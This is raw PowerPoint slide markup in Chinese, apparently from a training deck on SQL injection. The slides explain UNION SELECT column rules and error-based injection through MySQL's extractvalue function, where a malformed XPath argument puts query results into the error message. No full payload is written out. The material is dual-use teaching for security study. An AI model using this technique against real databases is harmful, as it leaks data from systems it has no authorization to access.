            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="矩形 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8525C34D-89C7-416A-B879-1B31A7452FBD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1627327" y="3346650"/>
            <a:ext cx="4342650" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>前提条件：能返回错误信息</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1996632576"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
    <mc:Choice Requires="p14">
      <p:transition spd="slow" p14:dur="3500">
        <p:random/>
      </p:transition>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow">
        <p:random/>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DFB0F556-322F-4195-A26F-D450CB32EDBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-46653" y="0"/>
            <a:ext cx="12192000" cy="6858000"/>
            <a:chOff x="349955" y="1137356"/>
            <a:chExt cx="12192000" cy="6858000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="3" name="组合 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A3BA2E8-15E4-49CF-8527-10DF42B34BFB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="349955" y="1137356"/>
              <a:ext cx="12192000" cy="3429000"/>
              <a:chOff x="349955" y="1137356"/>
              <a:chExt cx="12192000" cy="3429000"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="6" name="图片 5">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C954BF19-1EB9-4D05-8091-63E424CB6D0E}"/>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349955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="7" name="图片 6">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9599D275-CA36-41A2-8DB6-ECB9A1C0FE9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6445955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="4" name="图片 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CA29A3A-9B30-4E90-86BC-7279374CFA7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349955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5" name="图片 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1758681A-DE36-4659-817E-92F14A73E024}"/>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6445955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形: 圆角 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E5B8900-D99B-4021-B8B4-486AD244BDFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="485084" y="416902"/>
            <a:ext cx="11315141" cy="6008620"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>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a:t>UNION </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>内部的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句必须拥有相同数的列。列也必须拥有相似的数据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>类型。同时，每条 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>句把用户输入的数据当代码执行，这里有两个关键条件，第一个是用户能够控制输入；第二个是原本程序要执行的代码，拼接了用户输入的数据中的列的顺序必须相同。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" spc="600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="034581"/>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="组合 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B73F94C-56E8-4838-B55D-D266938D73E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6335090" y="347084"/>
            <a:ext cx="5427920" cy="708964"/>
            <a:chOff x="668080" y="698156"/>
            <a:chExt cx="5592043" cy="1016344"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="矩形 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DABBE8C0-A59E-448A-B0CA-DB618E0631FB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5613564" y="698156"/>
              <a:ext cx="646559" cy="1016344"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="F2D4AA"/>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pc="600">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形: 圆角 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E59C1A43-258D-4810-BCBC-FBE5A4155111}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="668080" y="698156"/>
              <a:ext cx="5099674" cy="1016344"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 0"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="475574"/>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pc="600">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="文本框 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D325D91C-7E6F-4BB8-837B-06D7EEFC0629}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="602450" y="549215"/>
            <a:ext cx="5304026" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>注入利用</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="文本框 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EAAC0692-DAC5-41B7-9C4D-E8D83DFD7F5F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="774635" y="1215274"/>
            <a:ext cx="5008844" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>报错注入</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F3CF56B-58C1-4505-87D7-4E2CD0C94ED7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="928497" y="1704016"/>
            <a:ext cx="2469888" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>Xpath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>语法错误</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="矩形 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9E5BF69-FF2A-4978-A9D0-98726BA87E62}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4200741" y="1679994"/>
            <a:ext cx="5949977" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:latin typeface="arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>XPath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>即为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>路径语言（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>XML Path Language</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>），它是一种用来确定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>文档中某部分位置的语言。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="矩形 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5E6C2AE-4333-4D31-98B0-06B8BDD77FA8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="669128" y="2567213"/>
            <a:ext cx="2469888" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>几个函数</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="矩形 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6352E97E-CC16-4E06-B8E7-080A8188B679}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="906432" y="3011730"/>
            <a:ext cx="5452262" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>extractvalue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>xml_document,Xpath_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="矩形 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3FC1EF98-87FA-4B7C-84E4-1DFA8195C934}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1632718" y="3496644"/>
            <a:ext cx="10054993" cy="1569660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>正常语法：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>extractvalue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>xml_document,Xpath_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>第一个参数：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>xml_document</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>格式，为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>xml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>文档对象的名称</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>第二个参数：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>Xpath_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>xpath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>格式的字符串</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>作用：从目标</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>xml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>中返回包含所查询值的字符串</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Helvetica Neue"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="矩形 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{010F511B-DD51-4F00-BBF0-8BFDBADF3C37}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="906432" y="5133948"/>
            <a:ext cx="10857316" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>第二个参数是要求符合</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>xpath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>语法的字符串，如果不满足要求，则会报错，并且</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>将查询结果放在报错信息里</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="矩形 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9DD309F-5943-4C72-8436-CF34565EBE27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="602450" y="5947787"/>
